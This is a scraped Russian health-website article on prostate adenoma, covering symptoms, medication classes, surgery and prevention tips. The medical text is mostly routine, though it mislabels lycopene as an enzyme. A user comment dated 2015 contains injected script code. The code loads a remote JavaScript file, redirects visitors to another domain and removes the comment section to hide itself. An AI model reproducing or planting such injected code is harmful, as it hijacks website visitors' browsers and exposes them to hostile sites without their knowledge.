Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Аденома предстательной же...  >>  Аденома предстательной железы
 
Обратная связь
 

Аденома предстательной железы

Размер шрифта
22 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Сколько раз за ночь ваш муж встает в туалет? Если больше двух раз, возможно, у него аденома простаты. Как предотвратить и как лечить эту опасную болезнь?

1

Аденома простаты неизбежна почти для каждого мужчины. «Каждый мужчина доживет до своей аденомы предстательной железы», - шутят урологи. И в этой шутке даже не доля, а все – правда, ведь это заболевание – часть процесса старения мужчин.

Тест: есть ли у мужчины аденома простаты

Предстательная железа увеличивается в размере на протяжении жизни. Важно при первых же тревожных признаках обратиться к врачу. И если мужчина за ночь встает в туалет более двух раз, значит, пора обратить внимание на свое здоровье.

Предстательная железа
Макет предстательной железы

Предстательная железа расположена у основания мочевого пузыря. Через тело этой железы у мужчин проходит мочеиспускательный канал.

Течение болезни

Аденомой предстательной железы называется доброкачественная гиперплазия предстательной железы, при этом сохраняется строение исходной железистой ткани. У 40-50% мужчин старше 50 лет и 70-80% старше 75 лет возникают изменения в виде разрастания железистой ткани в области шейки мочевого пузыря. Это и объясняет симптомы заболевания: увеличенная простата сдавливает мочеиспускательный канал.

Основные симптомы

  • затрудненное мочеиспускание
  • тонкая струя
  • учащенное мочеиспускания – 2-5 раз за ночь, из-за остаточной мочи
  • острая задержка мочи, сопровождающаяся сильной болью.

Лечение

Основные методы лечения:

  • альфа-адреноблокаторы – снижают тонус гладкой мускулатуры шейки мочевого пузыря и предстательной железы, из-за чего давление на мочеиспускательный канал ослабевает, и ток мочи облегчается;
  • блокаторы 5-альфа-редуктазы – уменьшают объем предстательной железы;
  • операция. В настоящее время проводится без скальпеля и разрезов. Врач удаляет излишки ткани предстательной железы через мочеиспускательный канал с помощью специального аппарата.

Профилактика

  • Помидоры и блюда на их основе, даже прошедшие термическую обработку. Употребление в пищу помидоров полезно из-за содержания в них фермента ликопина, снижающего риск развития аденомы и рака предстательной железы.
  • Регулярные лабораторные исследования. Все мужчины, после того, как им исполнилось 50 лет, должны один раз в год сдавать анализ на простатспецифический антиген (ПСА – опухолевый маркер, который используется в диагностике ранних стадий рака простаты).


Сюжеты по теме:
Внутренний враг. Аденома предстательной железы

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:54

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.